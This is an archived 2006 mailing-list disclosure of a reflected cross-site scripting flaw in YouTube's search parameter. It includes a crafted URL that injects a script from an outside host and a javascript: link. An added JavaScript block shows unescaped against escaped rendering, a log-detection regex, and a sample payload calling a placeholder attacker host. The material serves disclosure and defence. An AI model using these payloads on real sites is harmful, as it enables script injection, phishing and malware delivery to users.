There exists a lack of checking in the parameters passed to the search engine; as a result it is possible to even change the contents of the page. A successful exploitation may not only allow executing JS code, for instance to download trojans, but it is also possible to use it as a phishing attack. Here is an example that illustrates the threat:

http://www.youtube.com/results?search=gaki+no+tsuki%20%3Cimg%20src=%22http://www.danad.com.pl/pic/Zwierzeta/Kroliki/krolik%20002.jpg%22%3E%20%20%3Cscript%20src=%22http://michal.mooo.com/biuro/gora.js%22%20type=%22text/javascript%22%20language=%22JavaScript%22%3E%3C/script%3E%20%3Ca%20href=%22javascript:alert('exploited')%22%3EClick%20me%20to%20test%3C/a%3E&search_type=search_videos&search=Search

I would like to thank my precious Magdalena Pogorzelska for her support.

Regards,
sectroyer (Michał Majchrowicz)
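The flaw the post describes is a reflected "search" parameter copied into the page unescaped. The example below is added here and is not the poster's code nor YouTube's; the rendering functions and the sample URL (placeholder hosts, shaped like the request in the report) are constructed to show the unescaped reflection beside the escaped one, plus a simple log check for search terms carrying markup.

```javascript
// Added example (not from the original post). The render functions are a
// hypothetical stand-in for a search results page, not YouTube's code.

// Escape the five characters that matter in an HTML text/attribute context.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Vulnerable: the raw query parameter is copied straight into the HTML page,
// so markup inside the "search" parameter becomes part of the page.
function renderResultsVulnerable(search) {
  return `<h2>Results for: ${search}</h2>`;
}

// Hardened: the parameter is HTML-escaped before it is placed in the page.
function renderResultsHardened(search) {
  return `<h2>Results for: ${escapeHtml(search)}</h2>`;
}

// Extract the "search" parameter from a results URL the way a server would
// (percent-decoding and "+" -> space); the first occurrence is returned.
function searchParamOf(url) {
  return new URL(url).searchParams.get('search');
}

// Detection helper for access logs: flag a search term that contains a tag
// opener or a javascript: URL, i.e. something that only makes sense if the
// sender expects it to be reflected unescaped.
function looksLikeMarkupInjection(search) {
  return /<\s*\/?\s*[a-z]|javascript:/i.test(search);
}

// Constructed sample request using placeholder hosts (not the real URLs).
const SAMPLE_URL =
  'http://results.example.invalid/results?search=gaki+no+tsuki%20' +
  '%3Cscript%20src%3D%22http%3A%2F%2Fattacker.example.invalid%2Fx.js%22%3E' +
  '%3C%2Fscript%3E&search_type=search_videos';
```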
This archive was generated by hypermail 2.1.3 : Mon Jun 12 2006 - 20:55:35 PDT